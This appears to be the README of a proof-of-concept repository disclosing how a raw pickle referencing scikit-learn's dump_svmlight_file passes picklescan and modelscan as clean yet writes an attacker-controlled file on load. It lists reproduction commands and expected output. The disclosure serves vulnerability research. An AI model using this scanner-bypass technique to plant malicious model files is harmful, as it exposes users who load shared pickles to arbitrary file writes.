hacnho/sklearn-dump-svmlight-scanner-bypass-poc

scikit-learn dump_svmlight_file pickle-scanner bypass PoC

This PoC builds a raw pickle that uses a direct STACK_GLOBAL reference to:

module = "sklearn.datasets._svmlight_format_io"
name   = "dump_svmlight_file"

Both picklescan==1.0.4 and modelscan==0.8.8 report the pickle clean. A normal pickle.load() then creates /tmp/mfv_sklearn_dump_svmlight_scanner_bypass_20260624.svm with attacker-controlled SVMlight/libsvm content.

Run:

python3 -m venv /tmp/sklearn-dump-svmlight-scanner-bypass-venv
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python -m pip install --upgrade pip
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python -m pip install -r requirements.txt
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python reproduce_sklearn_dump_svmlight_scanner_bypass.py

Expected:

picklescan_clean=True
modelscan_clean=True
load_success=True
marker_exists=True
content_matches=True
REPRO_OK

The payload is generated with raw pickle opcodes and does not contain builtins.getattr.